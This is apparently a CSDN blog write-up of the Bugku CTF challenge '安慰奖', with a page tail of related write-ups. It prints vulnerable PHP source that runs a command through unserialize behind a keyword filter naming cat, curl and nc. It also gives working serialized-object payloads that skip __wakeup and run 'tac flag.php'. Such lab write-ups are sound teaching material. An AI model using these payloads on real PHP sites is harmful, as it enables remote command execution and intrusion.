Bugku:安慰奖

最新推荐文章于 2024-04-13 19:28:22 发布
最新推荐文章于 2024-04-13 19:28:22 发布
阅读量367 收藏 3
点赞数 1
分类专栏: Bugku CTF_Web_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46230755/article/details/113447313
版权

打开来查看源代码发现提示

 YmFja3Vwcw==

base64解码后得到:backups
扫描一下网站
在这里插入图片描述
在index.php.bak找到备份文件

<?php

header("Content-Type: text/html;charset=utf-8");
error_reporting(0);
echo "<!-- YmFja3Vwcw== -->";
class ctf
{
    protected $username = 'hack';
    protected $cmd = 'NULL';
    public function __construct($username,$cmd)
    {
        $this->username = $username;
        $this->cmd = $cmd;
    }
    function __wakeup()
    {
        $this->username = 'guest';
    }

    function __destruct()
    {
        if(preg_match("/cat|more|tail|less|head|curl|nc|strings|sort|echo/i", $this->cmd))
        {
            exit('</br>flag能让你这么容易拿到吗?<br>');
        }
        if ($this->username === 'admin')
        {
           // echo "<br>right!<br>";
            $a = `$this->cmd`;
            var_dump($a);
        }else
        {
            echo "</br>给你个安慰奖吧,hhh!</br>";
            die();
        }
    }
}
    $select = $_GET['code'];
    $res=unserialize(@$select);
?>

代码审计题:
这题对$select进行了反序列化,我们要构造code的序列化,来得到flag
我们要传入两个参数

protected $username = 'hack';
protected $cmd = 'NULL';

username等于admin,而cmd等于ls
同时,protected属性序列化的时候属性值会变成:%00*%00,在正常的输出中会看不见,但是转换成url的解码,就看得很清晰了。在这里插入图片描述
在这里插入图片描述
在反序列化过程中,题目unserialize(@$select)在运行时,会先进行__wakeup()的运行,我们只需要改变变量个数修改为大于实际值的数就能够绕过。
修改前

?code=O:3:"ctf":2:{s:11:"*username";s:5:"admin";s:6:"*cmd";s:2:"ls";}

修改后得到

?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:2:"ls";}

在这里插入图片描述
题目中过滤了很多字符,但是没有过滤tac。
我们利用tac flag.php一样可以达到查看flag的功能
和上面一样构造payload得到flag

?code=O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac+flag.php";}

在这里插入图片描述

FW_ENJOEY
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUGKU——安慰
doraemon12345的博客
06-08 215
昨天刚写了一道绕过_wakeup()函数的题目今天又遇到一道,刚好拿来复习一下 _wakeup()函数在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过_wakeup()函数的执行 打开题目发现是个空白页面,查看一下源码,有个base64解码,解密出一个单词,意思是备份,然后尝试下载备份,这里有几种方式,因为不知道是哪种,就一 一尝试 网站源码:www.zip .bak文件:xxx.bak(一般题目会提示文件名,不提示就尝试index.php.bak) vim缓存:xxx.swp意外退出为xxx
bugku web 安慰
m0_58189778的博客
08-19 327
题目:安慰 知识点:php反序列化 工具: 解题: 点开链接: 空白页面,然后查看源码,发现注释中有base64,解码得到backups,故猜测应该是和备份文件有关。 用御剑扫描,发现index.php.bak,下载打开: 先分析这个类,大致观察一下能拿到flag的地方就是__destruct中的反引号,这里执行了类的cmd属性;再看到后面的反序列化,这里应该是要构造相应的序列化字符串,当__destruct自动执行时命令执行即可。构造payload需要注意的是代码中过滤了.
bugku-web-安慰
最新发布
qq_75121443的博客
04-13 268
得到备份文件index.php.bak。得到flag.php文件内容。可以开始反序列化操作了。
bugku】-安慰
weixin_52116519的博客
04-01 785
考点1:绕过__wakeup() 当序列化字符串表示对象属性个数的值大于真实个数的属性时,就会跳过__wakeup()的执行。 考点2:私有属性绕过 ①protected属性被序列化的时候属性值会变成:%00*%00属性名。 private属性被序列化的时候属性值会变成:%00类名%00属性名。 ②直接url编码输出。 考点3:``反引号,可以作为系统命令输出给var_dump $a = `$this->cmd`; var_dump($a); 解题 1、看源码 2、base64解码,是“备份”的意
Bugku_安慰
CaiNiaoLW的博客
02-27 632
打开页面,发现是空白的,查看源码,发现一段base64加密的密文, 解密后是backups单词,这个意思是备份,可以猜测是跟index.php.bak文件有关,下载下来备份文件后,获得后台代码,开始代码审计。 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $user
Bugku CTF 每日一题 安慰
彼岸花苏陌的博客
01-19 650
安慰 打开网页啥都没有 习惯性按f12发现一段base64,解码后发现是 YmFja3Vwcw== backups(备份) 于是想到了网站备份,但是备份目录忘了 于是用dirsearch扫了一下 发现是index.php.bak 于是下载源码发现是代码审计 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class
BugKu_安慰
羽的博客
07-02 178
解码 告诉我有备份文件。 找到这个 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u...
代码3:安慰剂检验.do
12-08
代码3:安慰剂检验.do
2021部编版语文四年级上册口语交际:安慰.pptx
05-28
1. **理解安慰的含义**:在文中,“安慰”是指当一个人遇到困难或情绪低落时,他人通过言语或行动给予的支持和鼓励,以帮助其缓解负面情绪。在这个案例中,通过分析小峰、小丽和小冰的情境,让学生体会不同情境下...
site_effet_placebo:安慰剂效应工作人员在线商店网站
04-12
在构建"site_effet_placebo:安慰剂效应工作人员在线商店网站"时,主要涉及的核心技术是HTML(HyperText Markup Language),这是一种用于创建网页的标准标记语言。HTML5是目前广泛使用的版本,它为开发者提供了更多...
新人教统编版四年级上册语文 口语交际:安慰 优秀教学课件.pptx
10-20
《新人教统编版四年级上册语文 口语交际:安慰》的优秀教学课件旨在帮助学生掌握如何有效地进行口语交际,特别是如何给予他人安慰。在我们的日常生活中,安慰他人是一项重要的社交技能,它能建立人与人之间的情感...
新人教统编版五四制四年级上册语文 口语交际:安慰 优质教学反思.docx
10-12
本堂课的主题是“安慰”,旨在教导四年级学生如何有效地安慰他人,帮助他们在日常生活中建立良好的人际关系。以下是对这堂课的详细分析: 首先,教师创设情境是教学中的亮点。通过设置贴近生活的场景,如实物演示、...
bugku安慰(绕过__wakeup)
EC_Carrot的博客
12-24 932
题目 右键源代码发现<!-- YmFja3Vwcw== -->,base64解码提示说有备份 我这里用dirsearch扫到备份文件为index.php.bak 源码: error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($u
bugku 安慰
濯君
12-31 1939
打开网页,发现什么也没有,查看源码,发现YmFja3Vwcw==,base64解码,得到backups 查看根目录下index.php.bak文件,得到代码 <?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hac.
三十七、bugku安慰
山兔的博客
09-05 152
打开网页,一片空白,查看源码,发现YmFja3Vwcw==,base64解码得到backups。 用御剑土司没跑出来,御剑1.5跑出来了/flag.php,/index.php.bak。 下载文件,得到了源码,发现是考序列化和反序列化。 百度搜索相关知识, _wakeup()当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过_wakeup()的执行。 序列化就是将对象转换成字符串。字符串包括属性名、属性值、属性类型和该对象对应的类名。反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的
Bugku WEB 安慰
qq_41696858的博客
07-18 226
<?php header("Content-Type: text/html;charset=utf-8"); error_reporting(0); echo "<!-- YmFja3Vwcw== -->"; #base64解码,backups class ctf { protected $username = 'hack'; protected $cmd = 'NULL'; public function __construct($username,$cmd)
Bugku—凯撒部长的
王嘟嘟的博客
10-25 4766
0x00 前言 昨天忘记写CTF的题目了,所以这个是今天补充的。 题目 0x01 Start 这里一看就知道是凯撒大帝的密码。 使用框架直接解密。 MSW{byly_Cm_sIol_lYqUlx_yhdIs_Cn_Wuymul_il_wuff_bcg_pCwnIl_cm_u_Yrwyffyhn_guh_cz_sio_quhn_ni_ayn_bcm_chzilguncihm_sio_wuh_dic...
Bugku:Simple_SSTI_2
热门推荐
qq_46230755的博客
03-10 1万+
我超喜欢这种题目的,确实对我这种萌新非常的友好 打开后,题目提示存在模板注入 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po
移动抽页面js写法
05-31
移动抽页面的JS实现方式有很多种,下面是一种比较简单的实现方式: 1. 首先,需要定义一个抽的数组,包含每个品的概率和品名称,例如: ```javascript var awards = [ { probability: 0.1, name: '一等' }, { probability: 0.2, name: '二等' }, { probability: 0.3, name: '三等' }, { probability: 0.4, name: '安慰' } ]; ``` 2. 接着,需要编写一个函数来实现抽的逻辑,例如: ```javascript function lottery() { var random = Math.random(); // 生成一个随机数 var sum = 0; for (var i = 0; i < awards.length; i++) { sum += awards[i].probability; if (random <= sum) { return awards[i].name; // 返回中品名称 } } } ``` 3. 最后,在页面中添加一个抽按钮,并绑定点击事件,例如: ```html <button id="lotteryBtn">开始抽</button> ``` ```javascript var lotteryBtn = document.getElementById('lotteryBtn'); lotteryBtn.addEventListener('click', function() { var result = lottery(); // 调用抽函数 alert('恭喜您获得了' + result); // 弹出中结果 }); ``` 这样就完成了一个简单的移动抽页面的JS实现。当然,如果想要实现更复杂的效果,还可以添加动画、音效等特效。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值